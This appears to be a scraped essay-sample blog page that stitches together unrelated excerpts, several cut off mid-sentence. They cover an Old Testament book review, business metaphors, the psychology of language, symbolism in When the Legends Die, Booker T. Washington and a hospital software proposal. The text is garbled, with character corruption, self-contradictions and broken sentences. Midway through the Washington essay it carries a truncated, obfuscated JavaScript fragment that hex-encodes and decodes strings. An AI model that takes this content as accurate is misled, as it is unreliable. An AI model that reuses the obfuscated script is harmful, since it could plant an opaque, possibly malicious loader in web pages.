Thursday, October 31, 2019
Middle East Customs Essay Example | Topics and Well Written Essays - 750 words
Middle East Customs - Essay Example Waltke. He later went for overseas study in University of Goettingen in Germany between August 1982 to July 1983 where he furthered his education under the supervision of Dr. Rudolph Smend, Dr. Rykle Borger and Dr. Lothar Perlitt. He holds a doctorate degree in Philosophy in Old Testament from Emory University, Atlanta, Georgia which he was awarded in 1988. When he was studying in this University, he wrote a dissertation titled "A Rhetorical Analysis of the Book of Chronicles" under the supervision of John H. Hayes. Cracking Old Testament Codes helps the readers to understand the Old Testament and also enhances the way preachers interprets the Old Testament accordingly. The book is divided into two sections whereby the first three chapters are said to be an introduction for the reader to understand the concept of literary forms "genres" when we relate it to Old Testament. The Author begins the section with an article titled "Literary Forms of the Old Testament". In this section, the author tries to establish in written communication the reality of such forms which he explains in the Old Testament. According to the author, understanding of "genre" is quite involving as it concerns establishing the form, content and later on the textual unit function. He urges that there should be ten basic genres in the Old Testament and not the traditional five that are common on hermeneutic in older works. He also urges that for genres to function properly in the text, there are supposed to be ten in number. T he author advocates the use of three different genres namely:- Narrative History and, Law Moreover, prophecy is seen as a combination of prose and poetry that has three different genres that include: Oracles of Salvation, Announcements of Judgment and apocalyptic. Poetry is divided into psalms of lament and psalms of praise while wisdom has two main divisions that include proverbial and non-proverbial wisdom. The second division of the book are the ten chapters that mainly emphasizes on the values and dangers in the interpretive process in literary form perspective. "Genre criticism" is distinguished as it concerns with the final canonical form not the prior sources whether it is oral or in written form as it is commonly known with source criticism to some rhetorical criticism and degree form. This section has ten chapters and each one of them addresses the ten genre of the Old Testament literature. These chapters are viewed to very useful to the readers as they are very simplified for the reader to grasp the content easily. They are seen to be having very useful instruction and information for the readers. Finally, the last chapter is seen as giving instruction to the preachers to use the knowledge they acquire in these chapters when preparing the sermon. IV. Evaluation. Cracking Old Testament Codes is a valuable book to the reader as the author took time to think about his audience and every
Tuesday, October 29, 2019
Metaphor Review Case Study Example | Topics and Well Written Essays - 750 words
Metaphor Review - Case Study Example unqualified and mediocre minds and this is the sole responsibility of working as a gatekeeper ( Ning, Yu.(1998) One of the challenges of the gatekeeper is that it tends to mask other dimensions instead of acting as a program me changing of the society in publishing companies it also acts as an obstacle of the publishing company. The solutions that gatekeeper provides are not the ultimate solutions because they tend to hinder to hinder other from joining the editor organization. This can be also assumed that it is the role of the pursuant to guide the organization success and failure and this should not be blamed to anyone in specific. The Gatekeeper works as a conceptual framework to solve already existing problem the issue with this is that it does not anticipate any future problem and also does not value any new change towards a new solution. The marriage metaphor the case study about the analyses the fact that marriage is one of the important life decision in business this reflects more about acquisition of new business and growth of it. It is in this circumstance that it wants to show that growth is inevitable and it is the role of the business to expand. One of the key identities of this metaphor is for organization to know how they should relate as partners when they acquire new business and also to understand key business decisions. (KÃ ¶vecses, Z.2010) In this look, it is essential to note that the business is a prevailing issue that tends to see the continuity of business and progress. There is a very big relationship of the business and it is in finding the strengths of business that shows that it is important for the future options. The solution to this is valid as the business and the world is becoming a global village and it is important to expand beyond its origin as that is the ultimate worth of expansion. It is important to note that this metaphor shows how getting the right partner is a very important strategy and it is due to this
Sunday, October 27, 2019
Aspects of English Language
Aspects of English Language The language is the collection of symbols and rules for combining the symbols, which can express and infinite variety of messages. In the definition, language separate to three criteria. First is language is symbolic which known as the use of symbols such in spoken or written words to express ideas to the world. The second is language is generative which define as the capability to produce many different messages by combining symbols in different ways. The third language as structured which mean following grammatical rules and produce grammatical sentences. Besides the criteria, language has three aspects such as grammar, meaning and sounds. Three Aspects of Language Grammar is known as a set of rules for producing correct sentences in a language. Meaning is known as semantic understanding of sentences but is not necessary grammatically correct. Meaning of words can represent by breaking them into morphemes which is known as small units of meanings. Morphemes include stem words, prefixes and suffixes. For example word unfairly which has stem word as fair adding of prefix un and suffix ly and these morphemes produces changes in word stem. Each of morphemes contributes the different meaning for the words. The sounds are also very important in language. Its produce the phonemes to understand the spoken sentences. In hierarchical organization when producing sentences people will make error in speaking or slip of the tongue. The errors also can divide into word errors, morphemes errors and phoneme errors. There are other types errors occur in the linguistic such as word exchange, morpheme exchange and phoneme exchange. Word exchange is an error in whi ch two linguistic units are substituted for each other during sentence production. For example buying mother for my fruits rather than buying fruits for my mother. The morpheme exchange is known as error in which two morphemes are substituted for each other during sentence production. For example, sentence like speakly loud rather than speak loudly. Finally, phoneme exchange is known as an error in which two phonemes are substituted for each other during sentence production. For example, twit nower for twin tower. Psychology and Grammar Psychologists are interest to study how people learn to speak in grammatically correct sentences. Phrase structure grammar can define as a set of rules for partitioning a sentence into its grammatical units and it has 3 rules. The first is partitions the sentence into noun phrase followed by verb phrase. The second rule is states that the noun phrase can be partitioned into a determiner followed by a noun. The third rule states that the verb phrase can be partitioned into a verb followed by noun phrase, which is again broken down into a determiner and a noun. But Chomsky (1965) found that the phrase structure grammar does not explain how sentences can be modified to form of similar meaning. Later it came up with transformational grammar which known as a set of rules for transforming a sentence into a closely related sentence. For example, how we change an active statement into a passive statement. Besides that, words can be grammatical clues. The relation between meaning and grammar is important because producing a grammatical sentence does not make the sentence will be meaningful. The meaning of words sometimes provides hints as to grammatical phrases will come next in sentences. Many words have more than one meaning but this would not confuse us. The context in which the word appears gives information about which meaning is appropriate. Carpenter and Danemans (1981) general model of the stages involved in the sentence comprehension. The first stage is as fixate and encode the next word and then second stage is retrieving the meanings of words. The third step is try to integrate retrieved concepts with prior context and the fourth step is seeing whether it has integration been successfully completed for at least one concept. If the integration is successful, the process encodes next code and if not successful, we try to recover the error. Using Semantic Context in Sentence Comprehension The word recognition is often facilitated by the semantic context. Sometimes, people face difficulties in recognizing a word when reading the illegible handwriting and they rely on the surrounding words and sentences to help us identify the illegible word. People also select the meaning of ambiguous words by looking context of sentences. In resolving ambiguities, good readers those who are active in working memory able to interpret of an ambiguous word and quickly select the suitable meaning when they receive a clarifying context. Interpreting phrases is to produce syntactic and semantic representations of a sentence and relate the sentence to prior knowledge. For example, when people heard phrase a business man and they might have few interpretation like have luxury cars, a big bangle and rich with money. Implication of Sentences Comprehension is considering how people understand sentences in which the information asserted directly. But, using language can imply something without directly. In Courtroom testimony, implications can influence not only how a witness responds to questions but also helps the jury to remember about testimony of witness. The implication without telling the original meaning of something can find advertising. Some advertisement tells the problems face by customer and show their product as solution. So that people then understand how the product functioning. Literature Review Title: Investigating the role of language in childrens early educational outcomes From: Sue Roulstone, Judy Clegg Tim Paters (2010) Children develop their language skill at 2 years old. Their communication environments influence mainly their language development. The communication environments are the context where the children improve their language for example, interaction or activity with child and parent, playing with others, television program and others. In childhood period most children develop their speech and language skills with less effort. Roulston, Clegg and Paters (2010) have conducted a longitudinal study about their communication environment in childrens early educational performances. They want examine the characteristics of the environment in which children learn to communicate and extends which affect children readiness for school (language skills, reading, mathematics and social skills). They came up with three research questions. First is what extent is childs early language development associated with performance on assessments in schools. The second is what extent is the childs early communication environment associated with performance on the assessments. Third is what are the characteristics of the children early communication environment that contribute to the children language developments. They conducted the study on children who are in 24 months from 4941 boys and 4688 girls. The test conducted with questionnaires which complete by the mothers. The data collected about children academic performance from children schools. They found that from view of impact of children early language development on school entry, the language influenced mainly from social class or social background where children come from. The learning early language made an important contribution to the variation in childrens performance. Children understandings and use of vocabulary are very strongly associates with their performance. Besides that, from view of the impact of children communication environment, children who are early ownership of book, trips to library, get good attendance in school, parents teaching with activities and toys achieved higher scores on the assessment. Children also improve language from television program however, the increasing duration in time of watching television affect childs academic at school negatively. From the view of role of communication environment in the development of language skills, both childrens language skills communication environment are important for outcomes at start of primary schools. Communication environment helps to learn vocabulary, understanding of meaning of words and develop speech. Therefore, the role of language becomes clear within 24 months. Parents should make sure that children have better communication environment which help them to develop their language skills.
Friday, October 25, 2019
A Compareison Between When The Legends Die And Dances With Wolves :: essays research papers
     Symbolism      In the novel When the Legends Die and in the film Dances with Wolves symbolism is very important. Throughout both of them the used symbols are very similar but have very different meanings. In the movie, Dances with Wolves the wolf, Two Socks, and the horse, Cisco, are animal symbols, like the bear in When the Legends Die.      Two Socks and Cisco are the main two symbols in Dances with Wolves. Two Socks, is the wolf that befriends John Dunbar symbolizing the Sioux Indians who start trying to also befriend John. Then, when he takes the meat from John’s hand the wolf continues to symbolize the tribe, that will now accept John to come and be one of them. After, when Two Socks is shot by soldiers it symbolizes the fate of the Indians, later to come. Cisco, John Dunbar’s favorite horse is a symbol of John’s faithfulness to the Sioux Indian tribe, although they have tried to take the horse away many times he has always found a way to return to his master. Later in the story, when John is being shot at by the army the horse finds a way to make those shots hit him instead of John and separates from John in death, symbolizes that John will have to leave the Indians, to protect them.      In When the Legends Die the Bear cub who grows up with bears brother is a symbol, of hope, love, meaning, direction, and most importantly the heritage of Tom Black Bull. The bear symbolizes the Tom’s heritage because he came around just as Tom, started learning the old ways, his heritage, and he was separated from Tom when he, Tom, went to the new ways of life. In the new ways of life Tom’s difficulty is that he cannot find a place to run from his past. Then, he realizes that bear symbolizes his past, so Tom sets out to kill it. As Tom reaches the bear he pulls out the rifle and prepares to shoot the bear, but than he realizes that the bear not only symbolizes his past but all the good in his life because that is where he had the life in the old ways and was the happiest time in his life.
Thursday, October 24, 2019
Assess the view that Booker T. Washington was the most important leader in the development of AA civil rights Essay
Assess the view that Booker T. Washington was the most important leader in the development of African American Civil rights in the period 1865 to 1915? It could be argued that Booker T. Washington was the most important figure for developing black civil rights. Washington lived between 1856 and 1915 and was born into a slave family on a Virginia tobacco plantation. He was raised in a log cabin with no windows or beds. After the civil war and the emancipation proclamation his family moved to West Virginia where he worked as a coal miner and domestic servant while acquiring some form of schooling. When he was older he attended the Hampton Institute in 1872 and learnt various trades, his entrance examination consisted of cleaning a room. He then began a career as a teacher in West Virginia, then at the Hampton Institute and then was finally offered the position of founder and principal of Tuskegee in 1881 which was a college which had neither land nor buildings. Whether he was the most important leader is debatable as there were other leading figures trying to carve the way for black African American rights such as W.E.B. Du Bois, Ida B. Wells and Thaddeus Stevens. The aims and methods of Booker T. Washington is one way of assessing if he was the most important figure in the development of African American civil rights. He was a accommodationist, this is a theory in which he thought that African Americans should accept the situation for the time being and develop a pragmatic approach, demands for civil rights should be put on hold and a longer term strategy of developing their own community through economic development and educational advancement would come to the forefront. However this was attacked by Northern black militants who thought he â€Å"sought to little†. Washington’s views was criticised by another major black leader of the era, W.E.B Du Bois who believed that civil rights must be obtained by protest and that without political and legal rights; the black community could not economically prosper. In my opinion Booker T. Washing had the better aims as even if blacks did receive civil rights, they wouldn’t of have the economic prosperity to fully express them and so this method would have benefitted the black community greater even though it may of taken longer than the radical protestors at the time thought acceptable. Considering the extend and severity of white hostility towards African Americans at the time, accommodationism was likely to have exploited the few rights that they had gained better than confrontation for more rights. During the period 1865 to 1915 Booker T. Washington had various successes throughout his career, this is another way of assessing if he was the most important leader in the fight for black civil rights. One of these successes was his â€Å"Atlanta compromise†speech in 1895 which was a success as no black speaker had ever spoken at an important southern gathering such as the world fair which expressed his views that â€Å"it was foolish to agitate for social equality. Equality would come through work not force.†It was also successful as other blacks supported his view and thought that economic advancement was all they could gain for the moment and didn’t have the desire to mix with whites. He also benefitted several generations of African Americans with vocational education at Tuskegee which helped them to have more economic opportunities. He also established the National Negro Business league to support black people when setting up businesses in 1900. In could argued that other figures had greater successes in the campaign for African American civil rights such as W.E.B. Du Bois who had a number of successes such a helping to establish the NAACP in 1909 which was one of the most important twentieth century black civil rights organisation . His influential writings that blacks had special cultural and spiritual aspects this increased the black community’s pride of their race which was shown in the â€Å"Harlem Renaissance†. He also helped I believe that the impact of Washington’s success were great than Du Bois as he impressed many whites with the achievements and recognition with important political leaders such a Theodore Roosevelt who invited him to dine at the White House and used him as an advisor, which was remarkable at the time. Booker T. Washington also had a number of failures during his time when he was trying to improve the lives of African Americans, one of these failures was that by 1901 he was receiving a growing amount of critics who claimed he accepted the idea of white supremacy and had made no attempt to challenge the lower social position that blacks could not escape or to challenge the violent side of control such as lynching and even though he was a black advisor for several Presidents he did not use his position to try to change the political discrimination that blacks faced when trying to vote. Another failure that could be seen of Washington is that even despite his attempt to improve black education, black the literacy rate didn’t improve much and the gap of educational spending was widening between black and white schools, for every $2 spent on African American schools. Although this lowered his reputation It could be argued that he wouldn’t be able to change these factors however some of the black community argued he didn’t make enough of an effort to, which disagrees with the point that he was the most important leader in the development of African American civil rights in this time period. The legacy and influence that Booker T. Washington had on the development of African American civil rights, this is another way of evaluating how important he was as a leader. The influence he had on other blacks was inspiring as he advanced from being a slave to being appointed the principal of a college; this changed the mind set of blacks to thinking that if he can do it why can’t they. He also set a good example of self-discipline to his students. Between 1895 to 1905 he was also a main spokesman for the black people and gained several valuable contacts on the political scene which was dominated by whites. However it could be argued that Ida B. Wells had a great influence in the period due to her wide ranging activism especially in publicising lynching and the false rumours around it such as its cause being male black rape allegations. She also established institutes, national and local organisations that had lasting effect on communities; they benefitted both the black lower and middle classes. She also inspired women to take a more active role in campaigning for civil rights. Overall, taking all of the above factors into consideration I believe that Booker T. Washington could be considered the most important leader in the development of African American civil rights. Although it could be argued he didn’t achieve much in terms of actually gaining civil rights for blacks, the other prominent black leaders didn’t change much either and at least he was very influential figure and had several successes that were significant at the time, as shown his speech the â€Å"Atlanta compromise†which was supported by both whites and blacks. His connections in politics also seemed show that he was changing minds in the white dominated sector. He aimed to prove that blacks were just as hard working as whites and this was shown by increasing numbers of blacks being given jobs in vocational trades however this did not increase by as much as European immigrants. Other leaders may of contributed more by participating in major organisations such a NAACP that had made some advances in challenging court cases these organisations had more of an impact after the time period mentioned and so Washington can be credited with the most important African American leader between 1865 and 1915. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=††,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return ""},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Wednesday, October 23, 2019
Hospital Automation System Essay
The team has planned to develop a Hospital Automation System for the well knownhospital called Pannipitiya Nursing Home. Currently the client company depends on an error  – prone software system and a large amount of manual work. Development of a new systemwill help the client company to minimize the work load they handle manually and to eliminatethe faults and errors of the existing software system.This proposed system handles the entire hospital work load under seven major functions namely; OPD, IPD, Medical laboratory, Pharmacy and stores, Doctor services, Alertsystem and report generation and Billing system. The new system will be having key benefitsover existing system such as; high performance due to the immediate updating service provided by the system, reduce errors of putting unnecessary purchase orders, access to fullydetailed description about the patient regarding their medical reports, doctors will be pre -alerted about the appointment details of the day and th us the doctor can manage visiting time,reduce human effort and the cost spends to train new employees etc.
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